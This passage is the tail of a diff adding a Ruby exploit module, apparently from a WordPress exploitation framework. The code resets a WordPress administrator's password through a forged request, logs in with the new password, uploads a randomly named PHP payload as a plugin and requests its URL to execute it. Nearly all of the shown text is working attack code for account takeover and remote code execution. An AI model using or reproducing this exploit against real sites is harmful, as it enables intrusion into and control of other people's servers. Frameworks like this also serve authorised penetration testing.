'user_id' => admin_user_id
|
|
86
|
+
}
|
|
87
|
+
)
|
|
88
|
+
end
|
|
89
|
+
|
|
90
|
+
def before_upload
|
|
91
|
+
emit_info "Changing password for #{admin_username} to #{new_password}"
|
|
92
|
+
res = execute_password_change
|
|
93
|
+
|
|
94
|
+
unless res.code == 302
|
|
95
|
+
emit_error "Password change returned status #{res.code}", true
|
|
96
|
+
emit_error "Failed to change the password for #{admin_username}"
|
|
97
|
+
return false
|
|
98
|
+
end
|
|
99
|
+
|
|
100
|
+
@admin_cookie = authenticate_with_wordpress(admin_username, @new_password)
|
|
101
|
+
return true if @admin_cookie
|
|
102
|
+
false
|
|
103
|
+
end
|
|
104
|
+
|
|
105
|
+
def upload_payload
|
|
106
|
+
plugin_name = Utility::Text.rand_alpha(10)
|
|
107
|
+
payload_name = Utility::Text.rand_alpha(10)
|
|
108
|
+
@payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
|
|
109
|
+
return true if upload_payload_as_plugin(plugin_name, payload_name, @admin_cookie)
|
|
110
|
+
|
|
111
|
+
emit_error 'Failed to upload the payload'
|
|
112
|
+
false
|
|
113
|
+
end
|
|
114
|
+
|
|
115
|
+
def execute_payload
|
|
116
|
+
res = execute_get_request(url: @payload_url)
|
|
117
|
+
emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
|
|
118
|
+
end
|
|
119
|
+
|
|
120
|
+
def run
|
|
121
|
+
return false unless super
|
|
122
|
+
return false unless before_upload
|
|
123
|
+
|
|
124
|
+
emit_info 'Uploading payload...'
|
|
125
|
+
upload_payload
|
|
126
|
+
|
|
127
|
+
emit_info "Executing the payload at #{@payload_url}..."
|
|
128
|
+
execute_payload
|
|
129
|
+
|
|
130
|
+
true
|
|
131
|
+
end
|
|
132
|
+
end
|